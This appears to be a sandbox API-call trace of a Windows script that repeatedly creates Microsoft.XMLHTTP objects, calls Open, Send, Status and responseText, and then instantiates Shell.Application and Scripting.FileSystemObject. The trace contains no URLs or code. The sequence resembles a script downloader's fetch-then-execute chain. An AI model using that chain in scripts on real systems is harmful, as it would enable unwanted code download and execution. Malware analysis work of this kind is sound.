	[0294.288] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0294.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0294.288] longjmp () 
	[0294.288] longjmp () 
	[0294.289] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0294.289] SysStringLen (param_1=0x0) returned 0x0
	[0294.289] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0294.289] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0294.289] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0294.289] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0294.289] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0294.289] ??2@YAPEAX_K@Z () returned 0x62f310
	[0294.289] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0294.289] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0294.289] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0294.289] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0294.289] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0294.289] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0294.290] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0294.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0294.290] longjmp () 
	[0294.290] longjmp () 
	[0294.290] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0294.290] SysStringLen (param_1=0x0) returned 0x0
	[0294.290] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0294.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0294.290] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0294.290] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0294.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72c8) returned 0x0
	[0294.291] ??2@YAPEAX_K@Z () returned 0x62f330
	[0294.291] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72c8, pUnkSite=0x62f330) 
	[0294.291] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0294.291] XMLHTTPRequest:IUnknown:Release (This=0x49c72c8) returned 0x0
	[0294.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0294.291] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0294.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0294.291] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0294.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0294.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0294.291] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0294.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0294.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0294.840] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0294.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0294.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0294.840] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0294.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0294.840] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0294.840] SysStringLen (param_1=0x0) returned 0x0
	[0294.840] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0294.840] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0294.841] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0294.841] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0294.841] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0294.841] ??2@YAPEAX_K@Z () returned 0x62f350
	[0294.841] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0294.841] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0294.841] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0294.841] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0294.841] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0294.841] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0294.841] SysStringLen (param_1=0x0) returned 0x0
	[0294.841] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0294.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0294.844] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0294.844] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0294.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0294.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0294.844] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0296.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0296.253] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0296.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0296.254] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0296.254] SysStringLen (param_1=0x0) returned 0x0
	[0296.254] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0296.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0296.254] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0296.254] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0296.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0296.254] ??2@YAPEAX_K@Z () returned 0x62f330
	[0296.254] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0296.254] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0296.255] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0296.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0296.255] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0296.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0296.255] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0296.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0296.257] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0296.257] SysStringLen (param_1=0x0) returned 0x0
	[0296.257] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0296.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0296.257] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0296.257] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0296.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72c8) returned 0x0
	[0296.257] ??2@YAPEAX_K@Z () returned 0x62f310
	[0296.257] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72c8, pUnkSite=0x62f310) 
	[0296.257] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0296.257] XMLHTTPRequest:IUnknown:Release (This=0x49c72c8) returned 0x0
	[0296.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0296.257] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0296.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
